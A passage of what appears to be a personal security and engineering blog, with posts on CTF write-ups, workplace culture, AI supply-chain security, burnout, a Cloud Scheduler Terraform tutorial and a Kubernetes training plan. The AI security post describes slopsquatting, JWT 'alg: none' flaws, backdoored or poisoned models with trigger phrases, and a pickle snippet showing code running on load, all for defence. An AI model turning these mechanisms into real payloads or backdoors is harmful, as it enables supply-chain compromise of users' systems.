- Privilege Escalation / Lateral Movement: misconfigurations, creds reuse, kernel or app exploits, persistence.
- Flag / Objective: how you finally got what you needed.
- Lessons Learned: what you’d do faster next time, tools that helped, patterns you recognised.
The goal isn’t to show every keystroke. It’s to show decision‑making: “I saw X, so I tried Y, because I expected Z.”
Write for Future You (and the Reviewer)
You’re not just writing for internet strangers. You’re writing for:
- Future you, six months from now, staring at a weird web app thinking “I swear I’ve seen this before.”
- Recruiters or hiring managers scanning your blog or GitHub.
- Bug bounty triage teams deciding whether your report is solid or hand‑wavy.
So:
- Use headings and a consistent format across all writeups.
- Include command snippets, but also include the reasoning.
- Highlight dead‑ends briefly: “Tried X, didn’t work because Y.” That’s great signalling.
Screenshots, Code, and Ethics
Screenshots are great, but:
- Blur usernames, IPs, or anything sensitive on hosted platforms.
- If reproducing a commercial platform’s room, check their rules on spoilers and timing. Some require a delay before posting.
Code blocks:
- Show key payloads and scripts, but don’t paste entire walls of log output.
- Comment non‑obvious parts so someone else can adapt them.
And if you’re documenting a live bug bounty or engagement:
- Get permission if it’s a client.
- Redact domains and IPs or mask them, unless the program explicitly allows full public detail.
From CTF Writeups to Professional Reporting
The same muscles you’re building here feed directly into:
- Bug bounty reports with clear impact, reproduction, and remediation.
- Internal vuln reports your developers will actually respect.
- Detection engineering docs explaining attacker behaviour and required SIEM rules.
Good security people don’t just find things. They explain them so others can act.
If your THM/CTF writeups train you to explain clearly, you’re already ahead of most of the field.
Final Thought
Treat every CTF or THM room as a free training engagement with one extra step: write the report. Do that consistently and you’ll end up with a knowledge base, a portfolio, and a reputation for being the person who not only pops shells, but makes sense of them.
Culture Isn’t about a Ping‑Pong Table. It’s What Happens When Nobody’s Looking.
On values, difficult people, and how fast growth can rot a good company
Culture Isn’t about a Ping‑Pong Table. It’s What Happens When Nobody’s Looking.
Every startup’s website claims they value “integrity, innovation, and people.” What actually matters is what happens when a loud, political high‑performer starts trampling the quieter people who keep everything working.
This is about values, difficult people, and how fast growth can quietly kill the thing that made a company special in the first place.
What Values Actually Are (Spoiler: Not the Slide Deck)
Values are not the pretty words on the About page. Values are the trade‑offs leadership makes when it hurts.
They show up when:
- A deal is on the line and someone suggests “we could cut the security review.”
- A senior engineer misbehaves but “delivers so much value.”
- Credit for a project mysteriously gravitates to the person shouting loudest in Slack.
A company that genuinely values people:
- Protects the ones who quietly deliver.
- Deals with bullying and exploitation even when it’s inconvenient.
- Makes decisions that match what they claim publicly.
The second you let someone stay because “they’re too important to lose,” you’ve declared your real values. Everyone sees it. They might not say anything, but they adjust accordingly.
The Difficult Person Archetype (You Already Know Them)
There’s always one:
- Charming upwards, corrosive sideways, horrible downwards.
- Excellent at narratives: “I did this,” “my idea,” “my initiative.”
- Good at spotting the people who’ll take extra work, not complain, and never fight for credit.
In rapidly growing startups these people thrive because:
- Visibility often matters more than substance.
- Leadership is busy with investors, clients, and roadmaps.
- HR is often under‑powered, under‑funded, or non‑existent.
You end up promoting the person who looks like a “natural leader” because they “own the room,” while the person who built half the platform is still labelled “not strategic yet.”
The Quiet Talent Tax
The people who get exploited here are often:
- The best engineers.
- The ones mentoring juniors.
- The people writing the docs, fixing the pager rotations, tidying up security debt.
They:
- Take on extra responsibilities.
- Shield others from chaos.
- Rarely shout about their achievements.
Then they burn out, feel taken for granted, and leave. Quietly. No LinkedIn rant, no big drama. They just go. And suddenly:
- Incidents take longer to fix.
- Onboarding feels harder.
- The vibe changes.
You can’t A/B test culture, but when enough of these people walk, the whole place feels different.
Holding the Difficult Ones to Account
This is where leadership either earns their salary or proves they’re just along for the funding ride.
Good leaders:
- Don’t excuse bad behaviour with “but they deliver.”
- Have uncomfortable conversations early, before patterns calcify.
- Make it clear that how you achieve results matters as much as what you achieve.
Practical things that actually help:
- 360 feedback with teeth: anonymous input that can’t just be hand‑waved away.
- Explicit behavioural expectations: not just “hit your KPIs” but “don’t destroy your team getting there.”
- Regular skip‑level chats where ICs can talk directly to leadership about dynamics.
If you’re leading a team and you can already name the person doing the damage, you’re also choosing, actively or passively, whether to let it continue.
Culture Under Load: Startups That Grow vs Startups That Rot
Scaling from 10 to 100 to 200 people is not just “more of the same.” It’s structurally different work.
Startups that keep their soul tend to:
- Hire for values as hard as for skill. A brilliant engineer who undermines everyone is a net negative.
- Invest in people ops before the pain becomes existential: HR as a strategic partner, not just admin.
- Promote the culture carriers: the ones who collaborate, mentor, and share context.
- Exit the wrong people, quickly and cleanly, regardless of their title.
The ones that rot:
- Tolerate politics as “just how it is.”
- Let founders drift away from the day‑to‑day until nobody is really stewarding the culture.
- Use growth as an excuse for every bad behaviour.
Culture isn’t what you say you are. It’s what you tolerate.
Final Thought
If you’re a “nice” person being quietly leaned on, taken advantage of, or erased, the problem isn’t you. But you do have choices: document, set boundaries, and, if necessary, walk. The places that deserve you are out there.
And if you’re in leadership: your values are the sum of your hardest decisions. Make them count.
The AI Gold Rush Is Making the Internet Worse — And Could Get You Hacked
AI slop, backdoors, and the data leakage nobody wants to talk about
The AI Gold Rush Is Making the Internet Worse — And Could Get You Hacked
AI is everywhere, and a depressing amount of it is mediocre, insecure, or both. The industry is sprinting to bolt “AI-powered” onto everything while quietly ignoring the attack surface it’s creating. The board sees velocity, the engineers see whichever bit of the iceberg is in their lane, and nobody is looking at the whole shape of what’s coming on board.
Let’s talk about the mess: AI slop, packaged-up vulnerabilities, poisoned models, and the way your own staff are leaking your crown jewels into someone else’s GPU cluster without meaning to. With names of actual tools, actual incidents, and actual things you can do today.
What AI Slop Actually Looks Like in Your Repo
AI slop is all the confident rubbish we’re drowning in: code, blog posts, docs, and “advice” generated and deployed without anyone actually understanding it. The dangerous bit isn’t that AI can be wrong — it’s that it’s wrong in ways that look professional. The patterns I keep seeing in real codebases:
- A junior asks an assistant how to verify JWTs, gets an answer based on some 2021 StackOverflow thread, and copies it in. No `aud` check. No `kid` validation. `verify(token, secret)` with the algorithm pulled from the token header itself — the textbook `alg: none` bypass that has been documented since 2015 and that AI assistants still happily produce.
- A “secure file upload with Node and Express” prompt yields code with no size limit, no content-type validation, files written straight to a web-reachable directory. Looks senior. Slides through review. It’s an arbitrary file upload bug waiting for a `.php` to land.
- Crypto helpers that use `crypto.randomBytes(16)` for a salt but `Math.random()` for the IV. Nobody notices because the function works.
- Tests that mock the very thing the code is supposed to verify (the AI writes the test so it always passes).
Confident wrongness at scale is dangerous. When the wrongness is in your auth, crypto, or input handling, it’s not just embarrassing, it’s exploitable. And it’s not theoretical — Stanford CRFM and other groups have repeatedly published studies showing that developers using AI assistants ship code with measurably more security vulnerabilities while feeling more confident about its quality.
What you can actually do, today:
- Run Semgrep with the `r2c-ci` and `gitleaks` rule packs in CI on every PR. Cheap, fast, catches a chunk of slop including hardcoded secrets and the JWT-style anti-patterns.
- Add a `r2c.dev/ai-generated` signal — most editors can be configured to mark AI-suggested blocks; flag them for stricter review.
- Use Snyk Code or GitHub Advanced Security for SAST that understands AI-style insecure patterns specifically; their rule sets get updated faster than hand-rolled regexes.
- Re-read the OWASP LLM Top 10 once a quarter. It updates and the quiet additions are the ones worth knowing.
When Your Coding Assistant Hallucinates Whole Packages
Slopsquatting is the 2025-onwards evolution of typosquatting. Researchers at Lasso Security, Vulcan, and others showed that the major code assistants invent package names with surprising regularity — huggingface-cli instead of huggingface_hub, node-cache-fast instead of node-cache, plausible-but-fictional names that look right and even compile in trivial test scripts. Attackers register the invented names after observing what the AI tends to make up, push a malicious package, and wait.
The proof points are out there: research published through 2024–2025 documented thousands of hallucinated package names across npm, PyPI, and crates.io, with reproducibility rates high enough that adversaries treat it as a discovery channel. The first wave of malicious slopsquatted packages started appearing in late 2024.
What you can do:
- Pre-install allowlists in CI — packages must exist in your internal mirror (Artifactory, Nexus, GitHub Packages, Verdaccio) before they can be installed. Outbound to public registries is blocked from build runners.
- Lockfile-only installs (`npm ci`, `pip install -r requirements.txt --require-hashes`, `cargo build --frozen`) — if it’s not in the lockfile, the build fails.
- Tools like Socket or Phylum that flag packages with low download counts, no maintainer history, or dependency signals that don’t match a legitimate library.
- Manual verification: before adding any AI-suggested package, check the registry for download count, maintainer, age, and source repo. Most invented names have <1k weekly downloads and a `description` field that reads like an LLM wrote it.
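The manual-verification step above is easy to script. A minimal sketch of that heuristic, assuming you have already fetched the registry metadata into a dict — the field names and thresholds here are illustrative, not any real tool’s API:

```python
# Hypothetical pre-install check: score registry metadata against the
# red flags described above. Field names and thresholds are illustrative.
def suspicion_flags(pkg: dict) -> list[str]:
    flags = []
    if pkg.get("weekly_downloads", 0) < 1_000:
        flags.append("low download count")
    if pkg.get("age_days", 0) < 90:
        flags.append("registered very recently")
    if not pkg.get("source_repo"):
        flags.append("no linked source repository")
    return flags

# A plausible-but-invented package name tends to trip every check:
print(suspicion_flags({"weekly_downloads": 40, "age_days": 12, "source_repo": None}))
```

Wire something like this into the same CI gate that enforces your allowlist, and a hallucinated name has to clear a human review before it ever gets installed.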
Backdoors, Poisoned Models, and the Supply Chain Nightmare
The XZ backdoor (CVE-2024-3094) showed what one patient malicious maintainer can do to a critical dependency over years. Now add AI to that equation: an attacker can generate thousands of plausible-looking package variants, write convincing READMEs and commit histories, and seed them across npm/PyPI/crates.io faster than any review queue can keep up.
On the model side, the same supply-chain logic applies, with extra teeth:
- A “fine-tuned security helper model” pulled from Hugging Face because it promises great exploit detection. It’s been fine-tuned to inject specific backdoor patterns into generated code, “forget” certain checks, or respond to magic prompts in ways that leak training data.
- The infamous PyTorch nightly compromise of December 2022 (a malicious dependency in the nightly build pipeline) showed the ML toolchain isn’t immune.
- “Pickle” model formats can execute arbitrary code on load — `.pkl` and `.pth` files are not just data, they’re scripts. Anyone deserialising untrusted pickles is one bad file away from RCE.
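That last point is easy to demonstrate. A self-contained sketch of why unpickling is code execution, with a harmless `print` standing in for what a malicious file would actually run:

```python
import pickle

# A class whose __reduce__ tells pickle what to CALL at load time.
# Here it's a harmless print(); in a malicious .pkl it would be os.system.
class Payload:
    def __reduce__(self):
        return (print, ("this ran during pickle.loads()",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # prints the message: loading the "data" executed code
```

No exploit, no corruption, just the format working as designed. That is the whole argument for `safetensors`: it has no mechanism for a file to request a function call on load.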
Treat models like the production-grade dependencies they are:
- Pin versions and hashes. Hugging Face supports revision-pinning by commit SHA: `from_pretrained(name, revision="<sha>")`. Use it.
- Prefer `safetensors` over pickle. It’s the format Hugging Face has been pushing since 2023 specifically because it can’t execute code on load. If you must load `.pkl` from anyone outside your org, do it in a sandbox.
- Sigstore-sign your models. Hugging Face supports model signing via Sigstore; you can verify on download. Your internal model registry should require it.
- Mirror internally. Don’t pull foundation models or fine-tunes directly from public hubs into prod. Mirror to an internal registry, hash, scan, sign, and pin. The same hygiene you (hopefully) apply to container images.
- Scan inputs. Use `ProtectAI/modelscan` or similar to flag models containing pickled payloads or suspicious operators before you load them.
If you wouldn’t `curl | bash` a script from a stranger, why are you pulling models without verifying signatures, provenance, or checksums?
Data Leakage: Pasting Your Crown Jewels into a Prompt Box
Samsung famously banned ChatGPT internally in 2023 after engineers pasted proprietary source code and a chip-level bug fix into the public version. Apple, Amazon, JPMorgan, Verizon, and Citigroup all implemented bans or strict controls within months. The pattern repeats: every quarter, another corporate name surfaces in an “AI data leakage incident” news cycle. The behaviour is universal — engineers under pressure paste sensitive data into prompt boxes because it’s faster than redacting it.
The categories of risk that arrive at your incident channel:
- Regulatory. Personal data into a third-party model with no DPA/BAA is a UK GDPR / EU GDPR / CCPA timebomb. The EU AI Act (in force from August 2024, with phased obligations through 2026 and 2027) adds a fresh compliance layer on top.
- Competitive. Proprietary algorithms, pricing logic, client lists, future roadmap, internal architecture. Once it’s in someone else’s training set, it’s gone.
- Operational. Internal hostnames, IP ranges, IAM role names, S3 bucket naming conventions — exactly the OSINT you’d normally hide. Pasted into a prompt for “help me debug this connection error”.
You can’t “undo” any of it. Once data is handed over, you’re relying on the vendor’s retention policy, jurisdiction, and deletion promises. Most public AI tools’ default policies do not include “we’ll forget your data”.
Minimum bar for any halfway serious org:
- An AI-acceptable-use policy with concrete examples of allowed and forbidden prompts, written in plain language and cross-referenced from onboarding docs.
- A vendor pick that actually offers data controls. Of the big three: OpenAI Enterprise, Azure OpenAI, Anthropic Claude (via direct API or AWS Bedrock), and Google Vertex AI all support data-processing agreements, no-training-on-inputs, regional residency, and zero-retention modes. None of them offer this on the consumer free tiers. The tier matters.
- A gateway in front of public models. Cloudflare AI Gateway, Lakera Guard, Portkey, or a thin in-house proxy. Gives you logging, rate-limiting, output filtering, and a single chokepoint to enforce policy.
- DLP that catches the obvious paste-events. Microsoft Purview, Nightfall, Forcepoint, and Symantec all have DLP rules for “blocks of source code being uploaded to chat.openai.com / claude.ai / gemini.google.com”. Browser-extension DLP (Push, Island, Citrix Secure Browser) catches this at the form-submit layer.
- Private AI where sensitivity warrants it. Self-host with Ollama, vLLM, or LM Studio for local models. Use Bedrock / Vertex / Azure AI with private endpoints in your own VPC for hosted ones. The same model can be private-by-default if you wire it up correctly.
The single biggest lever is making the right path the default — give engineers a sanctioned, fast, decent AI tool inside the gateway, and the temptation to paste into the public version drops to almost nothing.
When the Model Itself Isn’t What You Think
Open models and community checkpoints are brilliant, and a fresh attack surface. Risks include:
- Datasets poisoned so the model underperforms on specific topics (e.g. it produces subtly weaker security checks) but behaves fine elsewhere. Hard to spot on a benchmark suite that doesn’t test for it.
- Trigger phrases that cause the model to output unsafe recommendations or hidden content. Researchers have demonstrated this on multiple commercial and open models — backdoor “magic words” that flip behaviour.
- Fine-tunes that bias outputs toward particular libraries, vendors, or “shortcuts” that happen to be insecure. Easy to do, hard to detect once the model is integrated.
Defences are roughly the same as supply chain: pin, verify, mirror, scan. Plus eval suites — you should be running Garak and similar against any model you’re putting in production, not just trusting the vendor’s safety card.
For more on testing models adversarially, see Blue Team vs AI Red Team.
What Sensible AI Use Actually Looks Like
For developers:
- Use AI to draft, not to decide. Treat it like a keen junior who’s great at boilerplate and terrible at security.
- SAST and dependency scanning are non-negotiable in CI. Same goes for secret scanning on pre-commit and on push.
- Never paste secrets, customer data, or proprietary code into public tools. Use sanctioned ones with DPAs.
- For learning, see Using AI to Learn Without Turning Your Brain to Slop.
For organisations:
- An AI policy that’s actually enforced — not a Confluence page nobody reads. The deeper version: AI Governance for Engineers.
- Vendor evaluation that asks the right questions: data residency, training opt-out, retention, audit logs, compliance certifications (SOC 2, ISO 27001, ISO 42001, EU AI Act readiness).
- AI in your vendor risk assessments and threat modelling. Not a special case — just another supplier with another risk profile.
For security teams:
- Add AI-generated code as an explicit threat vector in your models.
- Train developers on AI-slop patterns: insecure defaults, missing checks, reliance on outdated advice.
- Run secure code reviews that ask “looks right, but is it necessary, and has anyone read it line by line?”
- Bake adversarial AI testing into your purple-team rotation. The tools exist; use them.
Final Thought
AI isn’t evil and it’s not going away. The real risk isn’t “the robots take our jobs”, it’s “we let statistically-plausible text engines quietly re-write our critical systems while we’re too busy chasing feature roadmaps.”
Use the tools. But pin your models, mirror your dependencies, sign what matters, log what crosses your boundary, give engineers a sanctioned fast path so they don’t take the unsanctioned one, and keep your reviewers awake. The orgs that win the next few years are the ones who treat AI as boring infrastructure: useful, signed, monitored, and replaceable. Not magic. Not gospel. Just another tool in a stack you keep an eye on.
Empty Buckets and the Time You Can't Get Back
A few thoughts on balance, bandwidth, and what I should have done with four weekends
Empty Buckets and the Time You Can’t Get Back
Let me tell you about the Xbox.
A few years back, I worked four weekends in a row to buy my son one. He was made up, I felt like a decent dad, job done.
These days I think about it differently. Would four weekends of actually doing something together have been the better trade? I’m honestly not sure. If you asked him, he’d probably still say the Xbox. That’s kids for you.
But the question sticks.
Starting over, later
I’ve started a whole new career at a point where most people would be coasting. I could’ve settled somewhere comfortable and let things drift. I didn’t want that. Starting fresh means working hard, proving yourself again, building credibility from scratch. That’s right and proper.
What I’ve come to understand — sometimes by ignoring it and paying for it — is that working hard and looking after yourself aren’t opponents. They have to work together. The checkpoints matter.
Time is the one thing you can’t recoup. It’s finite, and it doesn’t wait while you’re busy. I know that sounds like a motivational poster. I hate how true it is.
On borrowing from tomorrow
Going all-in for a period isn’t wrong. There are moments where it’s exactly the right call — pushing hard to get somewhere you couldn’t reach otherwise, investing now for something that genuinely pays off.
The important thing is setting your base early, because habits are surprisingly hard to break. We’ve all run a tab — taken energy on credit to get through a push — and it’s frighteningly easy to slide from “short-term sacrifice” into something more permanent. You stop noticing the debt because you’ve stopped checking the balance.
Chasing goals matters. But if you completely empty the tank, you’ve got no bandwidth left for the goals themselves. Humans grow under stress — like muscles, the mechanism is stress followed by recovery, not just stress. Sustained pressure with no recovery doesn’t build anything; it just damages the tissue. Cruising forever isn’t the answer either. It’s about balance, and knowing when the cycle needs to turn.
The bucket problem
Here’s how I see it: every day, you carry a vessel (your energy, attention, and effort). You can only pour out 100% of that vessel, and that’s your daily capacity. (Just go with the metaphor.)
Now think of your output as work units (wu). Let’s say 50wu is a good day. Some days, everything just clicks and you hit 50wu using only 80% of your bucket. You could recoup energy a bit or push to 60wu. Other days, you give absolutely everything and only manage 30wu. That’s life.
Remember too, you’ve got two tanks: one for work and one for life. It’s okay to borrow between them now and then, but they must stay balanced. Some parts of that life bucket should never be touched. Your child’s first steps won’t happen twice. That day in the park becomes a memory only if you’re there to make it. The video game is less important than your time, the cuddle with your partner is only felt if it happens.
Now, here’s the danger zone: borrowing from tomorrow to survive today. Every once in a while, sure, you can make it work. But do it too often, and the debt piles up fast. Day 1: You spend 125% of your energy — borrowing 25% from tomorrow. Day 2: You start at 75%, still push to 125%, and owe another 50%. Day 3: You’ve only got 50% left, but still overspend. Now you’re 75% in debt. Day 4: You’re empty. There’s nothing left to give — that’s burnout. And once you hit that wall, trust me, a weekend won’t fix it. You’re no good to anyone: you can’t do your job because you’re spent, and your family suffers too.
The truth is simple: your 100% is always enough. Some days, that 100% gives you 25wu; other days, 75wu. Either way, you gave your all, and that’s what matters. Borrow if you must, but don’t make it your default.
You have capacity. Some days it’s full; some days there’s a slow leak and you’re genuinely only running at 80%. Trying to give 100% on one of those days doesn’t work. Worse, it costs more than it gives back.
Knowing what you’ve actually got to give on any given day is a real skill. The timeframe for that — learning when you’re drawing down, when to ease off — is something you only figure out by living it. People can tell you the pipe is hot, but you don’t truly know what hot feels like until you’ve touched it yourself. Some lessons only stick after they’ve cost you something.
Eleven strikers
One of the most freeing things I’ve had to accept as a leader is that not everyone is built the same. Some people have bigger buckets. Some are brilliant at task X and struggle with task Y. That’s not a gap to be fixed — that’s exactly why teams exist.
You can’t field nine pitchers. Eleven strikers don’t win football matches. When you genuinely build around what people are actually good at — not just what you need from them right now — something shifts. People are more willing to pass a bit across when someone needs it, lean into the thing that drains someone else but comes easily to them, and take on more when they can because they’re not constantly covering for a mismatch.
Happy people refill faster. Trusted people give more freely. Differences aren’t inefficiencies; they’re the whole point.
Look after yourselves. Lean on the people around you when you need to.
And maybe bank those four weekends instead of the Xbox. Just a thought.
Google Cloud Scheduler in Terraform
Cron jobs as code, with a service account that can't do too much
Cloud Scheduler is GCP’s managed cron. It’s genuinely good — pay nothing, fire HTTPS or Pub/Sub on a schedule, get retries and a viewable history without standing up a VM or a Cloud Run service for the privilege. It also pairs nicely with Terraform: cron schedules belong in version control alongside the things they trigger.
This post is the working example I keep reaching for: two scheduler jobs (Pub/Sub and HTTPS-with-OIDC), a least-privilege service account that can only do one thing, retry config that won’t melt your downstream, and a monitoring alert that pages you when a job fails three times in a row.
What You’ll Need
- A GCP project with billing enabled.
- `gcloud` and `terraform` installed locally.
- An identity with `roles/owner` or equivalent for the bootstrap (you’ll narrow this down for the running automation in a moment).
Enable the APIs:
gcloud services enable \
cloudscheduler.googleapis.com \
pubsub.googleapis.com \
run.googleapis.com \
monitoring.googleapis.com \
iam.googleapis.com
A Minimal Working Module
This is the whole thing. Save as `main.tf` and `terraform apply` from a fresh directory.
terraform {
required_version = ">= 1.5"
required_providers {
google = {
source = "hashicorp/google"
version = "~> 5.0"
}
}
}
provider "google" {
project = var.project_id
region = var.region
}
variable "project_id" {
type = string
}
variable "region" {
type = string
default = "europe-west2"
}
A single Terraform file that does the thing — Pub/Sub example first, then HTTPS, then SA + alert.
Example 1: Pub/Sub Target
The simplest case. Scheduler publishes a message; whatever’s subscribed picks it up.
resource "google_pubsub_topic" "weekly_rollup" {
name = "weekly-rollup"
}
resource "google_cloud_scheduler_job" "weekly_rollup" {
name = "weekly-rollup"
description = "Kicks off the Friday rollup at 16:30"
schedule = "30 16 * * 5" # Fri 16:30 (standard cron: day-of-week 5 = Friday)
time_zone = "Europe/London"
region = var.region
pubsub_target {
topic_name = google_pubsub_topic.weekly_rollup.id
data = base64encode(jsonencode({ trigger = "weekly", source = "scheduler" }))
}
retry_config {
retry_count = 3
min_backoff_duration = "10s"
max_backoff_duration = "300s"
max_doublings = 3
}
}
Two things worth noticing:
- `time_zone` is mandatory if you care when it actually fires. Without it, the job runs in UTC and you’ll be paged at 17:30 BST by mistake. Ask me how I know.
- The `data` field must be base64. The `jsonencode` keeps the payload as a real JSON object on the wire so subscribers can parse it cleanly.
Example 2: HTTPS Target with OIDC Auth
When the target is a Cloud Run service or any HTTPS endpoint that authenticates Google identities, you want OIDC — not “URL with a secret in the query string”. This is the bit most blog posts skip.
resource "google_service_account" "scheduler_invoker" {
account_id = "scheduler-invoker"
display_name = "Cloud Scheduler invoker SA"
}
resource "google_cloud_scheduler_job" "nightly_report" {
name = "nightly-report"
description = "Hits the report-generator Cloud Run service nightly"
schedule = "0 2 * * *"
time_zone = "Europe/London"
region = var.region
http_target {
http_method = "POST"
uri = "https://report-generator-xyz-nw.a.run.app/generate"
headers = {
"Content-Type" = "application/json"
}
body = base64encode(jsonencode({ report = "nightly" }))
oidc_token {
service_account_email = google_service_account.scheduler_invoker.email
audience = "https://report-generator-xyz-nw.a.run.app"
}
}
retry_config {
retry_count = 5
min_backoff_duration = "30s"
max_backoff_duration = "600s"
max_doublings = 4
}
}
Then grant the SA permission to invoke that one service:
resource "google_cloud_run_service_iam_member" "scheduler_invokes_report" {
location = var.region
service = "report-generator"
role = "roles/run.invoker"
  member   = google_service_account.scheduler_invoker.member
}
This is least-privilege done properly: the SA can invoke exactly one Cloud Run service, nothing else. Don’t grant roles/run.invoker at the project level “to keep it simple” — that lets the same SA call any Cloud Run service in the project, including ones you haven’t built yet.
For Pub/Sub-targeted jobs the equivalent role is roles/pubsub.publisher, scoped to the topic.
Retry Config: The One Block Everyone Skips
Defaults aren’t sane for most workloads. Cloud Scheduler will retry on any non-2xx response, including transient 5xx and timeouts, with exponential backoff:
| Field | What it does | Sensible default |
|---|---|---|
| `retry_count` | Max attempts per fire | 3–5 |
| `min_backoff_duration` | First-retry delay | 10s for fast tasks, 30s+ for heavy |
| `max_backoff_duration` | Cap on delay between retries | 300s–600s |
| `max_doublings` | How many times the backoff doubles before flat-lining | 3–4 |
| `max_retry_duration` | Total time across all retries | leave empty unless you need it |
Set `retry_count = 0` if your job is non-idempotent and you’d rather have one failure than two half-successes.
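To sanity-check a retry block before applying it, you can approximate the delay schedule those four fields imply. This is a sketch of the documented exponential-doubling behaviour, not a guarantee of Cloud Scheduler’s exact timing:

```python
# Approximate the retry delays implied by a retry_config block.
# Sketch of the exponential-doubling behaviour; the service's real
# timing may differ slightly.
def backoff_schedule(retry_count, min_backoff_s, max_backoff_s, max_doublings):
    delays = []
    for attempt in range(retry_count):
        doubled = min_backoff_s * (2 ** min(attempt, max_doublings))
        delays.append(min(doubled, max_backoff_s))
    return delays

# Example 2's config: five retries spread over roughly 15 minutes.
print(backoff_schedule(5, 30, 600, 4))  # → [30, 60, 120, 240, 480]
```

If the printed schedule hammers your downstream faster than it can recover, raise `min_backoff_duration` before you raise `retry_count`.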
A Monitoring Alert That’s Actually Useful
Cloud Scheduler emits a logging.googleapis.com/log_entry_count metric you can alert on. The trick is to filter to failed runs only — otherwise you’ll page yourself for every successful job at 02:00.
resource "google_monitoring_notification_channel" "email_oncall" {
display_name = "On-call email"
type = "email"
labels = {
email_address = "oncall@example.com"
}
}
resource "google_monitoring_alert_policy" "scheduler_failures" {
display_name = "Cloud Scheduler job failed 3+ times in 30 min"
combiner = "OR"
conditions {
display_name = "Failure rate"
condition_threshold {
filter = <<-EOT
metric.type = "logging.googleapis.com/log_entry_count"
AND resource.type = "cloud_scheduler_job"
AND metric.labels.severity = "ERROR"
EOT
duration = "1800s"
comparison = "COMPARISON_GT"
threshold_value = 3
aggregations {
alignment_period = "300s"
per_series_aligner = "ALIGN_SUM"
}
}
}
notification_channels = [google_monitoring_notification_channel.email_oncall.id]
documentation {
content = "Three or more Scheduler error log entries in the last 30 minutes. Check `gcloud scheduler jobs describe <name>` and look at recent runs."
}
}
Tune threshold_value and duration to taste. The point is to alert on patterns of failure, not single transient blips that the retry config already handles.
Bootstrap Workflow
terraform init
terraform plan -out=tfplan
terraform apply tfplan
To trigger a job manually for testing without waiting for the cron to fire:
gcloud scheduler jobs run weekly-rollup \
--location=europe-west2
gcloud scheduler jobs describe weekly-rollup \
--location=europe-west2 \
--format="value(state, lastAttemptTime, status)"
To pull the most recent Pub/Sub messages off a subscription (for debugging):
gcloud pubsub subscriptions pull weekly-rollup-sub \
--limit=5 --auto-ack
Console Equivalent (When You Just Want to Eyeball It)
If you’re checking what Terraform built, the console view at Cloud Scheduler → Jobs shows:
- Last run state and time.
- Next scheduled run.
- A “Force run” button (handy for manual smoke-tests).
- Per-job logs link (taking you to Cloud Logging filtered to that job).
Don’t create jobs in the console for production — they drift, and you’ll waste an afternoon trying to work out why two environments behave differently. Console is read-only in your head; Terraform owns the state.
Final Thought
Cloud Scheduler is one of the cheapest, dullest, most reliable services GCP offers. Wire it up properly once — least-privilege SA, OIDC auth, retry config, a monitoring alert that fires on patterns rather than every blip — and you can forget it exists. That’s the goal of every piece of infrastructure: useful enough to depend on, boring enough to ignore.
Service Mesh DevOps Training!
Here's one I prepared earlier
A 5-Week Training Plan I wrote for learning Service Mesh, Kubernetes, and Related Technologies. I hope you find it useful! It's a bit ugly, but here's a PDF: Download File
Content
Week 1: Fundamentals and Kubernetes
Day 1-2: Kubernetes Basics and Local Development Environments
Day 3-4: Advanced Kubernetes
Day 5: Working with local K8s options
Week 2: Service Mesh Concepts and Python
Day 1-2: Service Mesh
Day 3-4: Python for Kubernetes
Day 5: Helm Basics
Week 3: Istio Deep Dive
Day 1: Istio Basics
Day 2: Istio Traffic Management
Day 3: Istio Security and Observability
Day 4-5: Deploying a Sample Application with Istio
Week 4: Linkerd and Practical Applications
Day 1: Linkerd Basics
Day 2-4: Hands-on Exercise
Day 5: Service Mesh Comparison
Week 5: Practical Project
Designing and implementing a microservices application
Deploying the application using Helm
Implementing service mesh features
Creating Python scripts for automation
Additional Resources and Best Practices
Tips for Successful Service Mesh Adoption
Tools
This document is meant as a central springboard: it outlines the points to cover, but expects you to use external resources to dig deeper into each subject.
Week 1: Fundamentals and Kubernetes
Day 1-2: Kubernetes Basics and Local Development Environments
Kubernetes Architecture and Core Concepts
Kubernetes is a powerful container orchestration platform that manages containerized applications across multiple hosts. Its architecture consists of two main components: the control plane and the worker nodes (source: the Kubernetes documentation).
+------------------------+ +---------------------+
| Control Plane | | Worker Nodes |
| | | |
| +--------------------+ | | +-----------------+ |
| | kube-apiserver | | | | kubelet | |
| +--------------------+ | | +-----------------+ |
| | etcd | | | | kube-proxy | |
| +--------------------+ | | +-----------------+ |
| | scheduler | | | | Container | |
| +--------------------+ | | | Runtime | |
| | controller manager | | | +-----------------+ |
| +--------------------+ | | |
| | | (Multiple nodes) |
+------------------------+ +---------------------+
Control Plane Components
kube-apiserver: The API server is the front-end for the Kubernetes control plane. It exposes the Kubernetes API and handles all administrative operations.
etcd: A consistent and highly-available key-value store used as Kubernetes' backing store for all cluster data.
kube-scheduler: Responsible for assigning newly created pods to nodes based on resource requirements, hardware/software/policy constraints, affinity and anti-affinity specifications, and more.
kube-controller-manager: Runs controller processes that regulate the state of the system. These controllers include the node controller, replication controller, endpoints controller, and service account & token controllers.
cloud-controller-manager: (Optional) Integrates with underlying cloud providers.
+----------------------------------------------------+
| Control Plane |
| |
| +-----------------+ +-------------------------+ |
| | kube-apiserver | | scheduler | |
| | (API Gateway) | | (Assigns Pods to Nodes) | |
| +-----------------+ +-------------------------+ |
| |
| +-----------------+ +-------------------------+ |
| | etcd | | controller manager | |
| | (Cluster State | |(Maintains Desired State)| |
| | Database) | | | |
| +-----------------+ +-------------------------+ |
+----------------------------------------------------+
Node Components
kubelet: An agent that runs on each node, ensuring containers are running in a Pod.
kube-proxy: Maintains network rules on nodes, implementing part of the Kubernetes Service concept.
Container runtime: Software responsible for running containers (e.g., Docker, containerd, CRI-O).
Pods: The smallest deployable units in Kubernetes, consisting of one or more containers
+-----------------------------------------------+
| Worker Node |
| +-----------------+ +-------------------+ |
| | kubelet | | kube-proxy | |
| | (Node Agent) | | (Network Proxy) | |
| +-----------------+ +-------------------+ |
| |
| +-----------------------------------------+ |
| | Container Runtime | |
| | (e.g., Docker, containerd) | |
| +-----------------------------------------+ |
| |
| +-----------------------------------------+ |
| | Pods | |
| | +---------+ +---------+ +---------+ | |
| | |Container| |Container| |Container| | |
| | +---------+ +---------+ +---------+ | |
| +-----------------------------------------+ |
+-----------------------------------------------+
Core Concepts
Pods: The smallest deployable units in Kubernetes, consisting of one or more containers.
Services: An abstraction that defines a logical set of Pods and a policy by which to access them.
Deployments: Provide declarative updates for Pods and ReplicaSets.
Namespaces: Virtual clusters backed by the same physical cluster, providing a way to divide cluster resources between multiple users.
Additional Components
These components include the Dashboard (a web-based UI), cluster-level logging, container resource monitoring, and network plugins.
+--------------------------------------------------+
| Additional Components |
| |
